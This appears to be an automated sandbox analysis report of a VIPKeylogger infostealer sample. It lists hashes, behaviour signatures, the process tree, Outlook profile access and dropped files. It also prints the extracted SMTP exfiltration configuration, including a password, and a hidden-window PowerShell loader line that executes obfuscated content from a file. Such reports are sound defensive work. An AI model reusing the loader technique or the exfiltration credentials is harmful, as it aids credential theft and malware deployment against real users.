Analysis
-
max time kernel
144s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-10-2024 12:26
Static task
static1
Behavioral task
behavioral1
Sample
001_215_EA2047939_202410210815.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
001_215_EA2047939_202410210815.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Kontokurantens.ps1
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
Kontokurantens.ps1
Resource
win10v2004-20241007-en
General
-
Target
001_215_EA2047939_202410210815.exe
-
Size
867KB
-
MD5
25da279ad7ee7cc3b8d3e5cd5aa4b5b2
-
SHA1
d1fc6cbe8d8cca235ed29de6b109a0cb951eb5f3
-
SHA256
963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0
-
SHA512
db074cfe6c006f194b8b4ca983fb83a88229beb229504c8eba07140fe490974e90dfe75b66b9c4d81bd319fdaaccc822473064771b7ac8d333012859f139498e
-
SSDEEP
12288:l9Zwb4/I1H06OdtVQuqilUSDFOIBETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0W:/dPFtVtOIB+alCJmvulW6Nd0vu
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.fr - Port:
587 - Username:
[email protected] - Password:
Jc.2o3o@ - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 4708 powershell.exe 448 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
msiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 16 IoCs
Processes:
msiexec.exemsiexec.exeflow pid process 30 1520 msiexec.exe 31 4384 msiexec.exe 35 1520 msiexec.exe 34 4384 msiexec.exe 37 1520 msiexec.exe 38 4384 msiexec.exe 44 1520 msiexec.exe 45 4384 msiexec.exe 51 4384 msiexec.exe 52 1520 msiexec.exe 63 1520 msiexec.exe 65 1520 msiexec.exe 68 4384 msiexec.exe 69 4384 msiexec.exe 71 1520 msiexec.exe 73 4384 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 62 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
msiexec.exemsiexec.exepid process 1520 msiexec.exe 4384 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 448 powershell.exe 4708 powershell.exe 1520 msiexec.exe 4384 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
msiexec.exemsiexec.exe001_215_EA2047939_202410210815.exepowershell.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 001_215_EA2047939_202410210815.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\001_215_EA2047939_202410210815.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\001_215_EA2047939_202410210815.exe nsis_installer_2 -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 4708 powershell.exe 448 powershell.exe 4708 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 448 powershell.exe 4708 powershell.exe 448 powershell.exe 4708 powershell.exe 448 powershell.exe 4708 powershell.exe 4708 powershell.exe 448 powershell.exe 1520 msiexec.exe 4384 msiexec.exe 1520 msiexec.exe 4384 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exepowershell.exepid process 448 powershell.exe 4708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 4708 powershell.exe Token: SeDebugPrivilege 448 powershell.exe Token: SeIncreaseQuotaPrivilege 448 powershell.exe Token: SeSecurityPrivilege 448 powershell.exe Token: SeTakeOwnershipPrivilege 448 powershell.exe Token: SeLoadDriverPrivilege 448 powershell.exe Token: SeSystemProfilePrivilege 448 powershell.exe Token: SeSystemtimePrivilege 448 powershell.exe Token: SeProfSingleProcessPrivilege 448 powershell.exe Token: SeIncBasePriorityPrivilege 448 powershell.exe Token: SeCreatePagefilePrivilege 448 powershell.exe Token: SeBackupPrivilege 448 powershell.exe Token: SeRestorePrivilege 448 powershell.exe Token: SeShutdownPrivilege 448 powershell.exe Token: SeDebugPrivilege 448 powershell.exe Token: SeSystemEnvironmentPrivilege 448 powershell.exe Token: SeRemoteShutdownPrivilege 448 powershell.exe Token: SeUndockPrivilege 448 powershell.exe Token: SeManageVolumePrivilege 448 powershell.exe Token: 33 448 powershell.exe Token: 34 448 powershell.exe Token: 35 448 powershell.exe Token: 36 448 powershell.exe Token: SeIncreaseQuotaPrivilege 4708 powershell.exe Token: SeSecurityPrivilege 4708 powershell.exe Token: SeTakeOwnershipPrivilege 4708 powershell.exe Token: SeLoadDriverPrivilege 4708 powershell.exe Token: SeSystemProfilePrivilege 4708 powershell.exe Token: SeSystemtimePrivilege 4708 powershell.exe Token: SeProfSingleProcessPrivilege 4708 powershell.exe Token: SeIncBasePriorityPrivilege 4708 powershell.exe Token: SeCreatePagefilePrivilege 4708 powershell.exe Token: SeBackupPrivilege 4708 powershell.exe Token: SeRestorePrivilege 4708 powershell.exe Token: SeShutdownPrivilege 4708 powershell.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeSystemEnvironmentPrivilege 4708 powershell.exe Token: SeRemoteShutdownPrivilege 4708 powershell.exe Token: SeUndockPrivilege 4708 powershell.exe Token: SeManageVolumePrivilege 4708 powershell.exe Token: 33 4708 powershell.exe Token: 34 4708 powershell.exe Token: 35 4708 powershell.exe Token: 36 4708 powershell.exe Token: SeDebugPrivilege 1520 msiexec.exe Token: SeDebugPrivilege 4384 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
001_215_EA2047939_202410210815.exepowershell.exepowershell.exedescription pid process target process PID 1844 wrote to memory of 4708 1844 001_215_EA2047939_202410210815.exe powershell.exe PID 1844 wrote to memory of 4708 1844 001_215_EA2047939_202410210815.exe powershell.exe PID 1844 wrote to memory of 4708 1844 001_215_EA2047939_202410210815.exe powershell.exe PID 1844 wrote to memory of 448 1844 001_215_EA2047939_202410210815.exe powershell.exe PID 1844 wrote to memory of 448 1844 001_215_EA2047939_202410210815.exe powershell.exe PID 1844 wrote to memory of 448 1844 001_215_EA2047939_202410210815.exe powershell.exe PID 448 wrote to memory of 1520 448 powershell.exe msiexec.exe PID 448 wrote to memory of 1520 448 powershell.exe msiexec.exe PID 448 wrote to memory of 1520 448 powershell.exe msiexec.exe PID 4708 wrote to memory of 4384 4708 powershell.exe msiexec.exe PID 4708 wrote to memory of 4384 4708 powershell.exe msiexec.exe PID 4708 wrote to memory of 4384 4708 powershell.exe msiexec.exe PID 448 wrote to memory of 1520 448 powershell.exe msiexec.exe PID 4708 wrote to memory of 4384 4708 powershell.exe msiexec.exe -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\001_215_EA2047939_202410210815.exe"C:\Users\Admin\AppData\Local\Temp\001_215_EA2047939_202410210815.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4384 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD59de7476fdc0bdfcc7b78c40eb0b7ae9c
SHA1e95ecafe1e4f0da7b4cd6d238d75d367f7c9b5cc
SHA2568f4a054cea59ba5bc892962f7ee8c79dafd4ea7e182af0d7fbe3ce89f93750bc
SHA5125bc6682c81b5cdea27a198215d02df7e64a53ca5c92d272d2b1140d32deea3d112b596e8eb35e6f79dc609964a32dab6a4ef83b3845b1057b86bd17537cd2cc2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD5d27e8f4f186e50ed883dc1676cbb4038
SHA14dc99e2f5a1b7eafbceb0b837d9030424d67d8a4
SHA256ea5e76383ebf4550a6d4f3e561534cdbda582899df18c32c1ae085e0b1ff9ed8
SHA5123f6c599fdc2eaf4b42b1b594226438cc4d9b3a7846577b16307023c355757b794b1305b260c0d9e0071483e709dc7d5d190ba89ef3808185b4cd2d529c932372
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5fff9aba6fe7a03ac24297af4a6ef7600
SHA17ed4438da3b2bd2080a577c149f0029337d68fe8
SHA256510ed87ce53d8777b77a0de99754d355529f7f2f9e9a05690b927d1ced4dbe92
SHA51286b21267b1379717e414a374f113556c779246026569ab0adbda017d68532a62bd8999e5deb49f059b76c0c10ea15ca40e251f7efc5bdddbac7114ee002342c8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD50c18cf82ddce8803aba4fb55bbeca6ca
SHA1c84097556ddcb20901b8f51912c1f8eec8c3d29c
SHA256ded37b992fc47288dcb37c2f16a9f84b372fa7f4e721e25e9378c098d66d2916
SHA5125fd3942de0dbf9726fc7e72567cc8cf306ca04c02e02ec7d17f3ac5fd6bad07d20682c04add62155d4adbb46372d4c27fb868935d2555987ed563288c0acc43c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD583e612914b62f1baf4cbebe922c0ce9d
SHA1bc34eb2a4cda48897bf001ee4cf77055ae578588
SHA256935baf8e8b135606fbe0220ba683171f5df95ebfa80b8738559417b5d93a18ef
SHA5128b9a4ee1a4dda501a0a2b31f3330f4110a2435df11debf560f0c915fffff421052c2eddce0eeeed83fa8c781202783cbb71dfdf9275aad6ae61010474d8bd1a2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5ac7538943398b0b9248700e0a17715fe
SHA1cc13645350f899a0d48fa907fb065bd54bc17fc0
SHA256aee438396676775daa479bbc6beada288cb8bcc995892efbf2b91c6c1d82a317
SHA51238923daf7b579f47b9e7ae1e777d3d4eb4db05ec4661160be68357e03087b7da809dc077349bb534a22b844a6a9f8871f847c9642c321b4941d0d479020186f2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD56ec35013b14af827e2615d2cacb611e4
SHA15e14cdfba35c1fadc76095588316a9b0b6b2de16
SHA2568955b6902b4770e158d43b90705d7104c141f1df374b8e2504423fc890cff1a2
SHA512f5c69f08ee4864c43287c33669ccacd72d34edcd8e81224c46f840076c9511ee8e69f7a8b2e7b7a32909cbe55210ee29591066840aac4e5ff4e4474ace0fe6b4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD5d1a2d84782553db950546ff01c3f3503
SHA110950f92a1487b7fccc72790c6d9af9af14e387d
SHA2566c3077458a25dc6bb9fe55567522d5a3417b3b2719ae6dfb2fa3591ca01bf28a
SHA5129a50d7a7496784d124cafec82b662fa6399ae9e621386a57dd8040139fcc3fea758debf2e34a5b5a77f6c4f660209f118662264fc0ea143e03194efce1be7e4e
-
Filesize
53KB
MD501404e51f6442f60e478c306b1e6e52e
SHA137f234ccf5611b8309023410ceb9e76ad81f5678
SHA256d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA51294a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
867KB
MD525da279ad7ee7cc3b8d3e5cd5aa4b5b2
SHA1d1fc6cbe8d8cca235ed29de6b109a0cb951eb5f3
SHA256963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0
SHA512db074cfe6c006f194b8b4ca983fb83a88229beb229504c8eba07140fe490974e90dfe75b66b9c4d81bd319fdaaccc822473064771b7ac8d333012859f139498e
-
Filesize
334KB
MD58dc34d1e450d9695f44738379365b189
SHA19e77d26860ba038a647b6670fd0ddd2c961d0666
SHA256fb8575b17a714bab821f43e25454975876348a6ccf9fb580f25351311d09690b
SHA512f842056d5dcd6f43c88ff6ba91eb6207d3fa48b4e38f050a756fbe3d281cf8483def8a4221f63407953d589be05a7505c31fc6df12a0ed77dd64581e27722f08
-
Filesize
50KB
MD58a4da8bab6993bc24f8ba89b1a5035ba
SHA10266616ebaff76b9027bdf4a52742bbb6d7dbf90
SHA256d19add8d848501931650d9c2f77d4519b15ffe2399a161dac88ea99c07f1b62d
SHA5121f604a65b0fb4543feab6eb9584aab3c47c5ebcabf251492c7be827e3c5d547f310ff05354bf30837fe8192be427c1855ec22783a0be14db15b40b1f05a13c50